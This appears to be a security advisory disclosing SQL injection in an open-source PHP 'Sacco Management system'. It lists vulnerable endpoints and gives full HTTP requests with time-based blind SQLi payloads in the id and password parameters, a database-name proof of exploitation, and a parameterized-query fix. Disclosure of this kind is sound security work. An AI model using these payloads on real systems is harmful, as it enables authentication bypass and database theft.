Affected Version: “Sacco Management system”

Product Link: https://www.sourcecodester.com/php/15372/open-source-sacco-management-system-free-download.html

Security Issue:

SQL injection via GET parameter password and id 

URL: <http://localhost/sacco/ajax.php>
Parameter: password

URL's:
<http://localhost/sacco/ajax.php>
<http://localhost/sacco/load_fields.php>
<http://localhost/sacco/manage_loan.php>
<http://localhost/sacco/manage_borrower.php>
<http://localhost/sacco/manage_user.php>
Parameter: id

Vulnerability Description:

SQL injection (SQLi) refers to an injection attack wherein an attacker can execute malicious SQL statements that control a web application's database server.

HTTP Request:

POST /sacco/load_fields.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
X-Requested-With: XMLHttpRequest
Referer: <http://localhost/sacco/>
Cookie: PHPSESSID=jpf03ug3v00hai12gb9gimprtt
Content-Length: 47
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive

&id=if(now()=sysdate()%2Csleep(4)%2C0)&loan_id=

POST /sacco/ajax.php?action=login HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
X-Requested-With: XMLHttpRequest
Referer: <http://localhost/sacco/>
Content-Length: 66
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive

password=0'XOR(if(now()=sysdate()%2Csleep(4)%2C0))XOR'Z&username=1

HTTP Response:

Untitled

Untitled

Proof of Exploit:

SQL query - SELECT database()
sacco

The impact of this vulnerability:

An attacker can use SQL injection to bypass a web application's authentication and authorization mechanisms and retrieve the contents of an entire database. SQLi can also be used to add, modify and delete records in a database, affecting data integrity. Under the right circumstances, SQLi can also be used by an attacker to execute OS commands, which may then be used to escalate an attack even further.

How to fix this vulnerability:

Use parameterized queries when dealing with SQL queries that contain user input. Parameterized queries allow the database to understand which parts of the SQL query should be considered as user input, therefore solving SQL injection.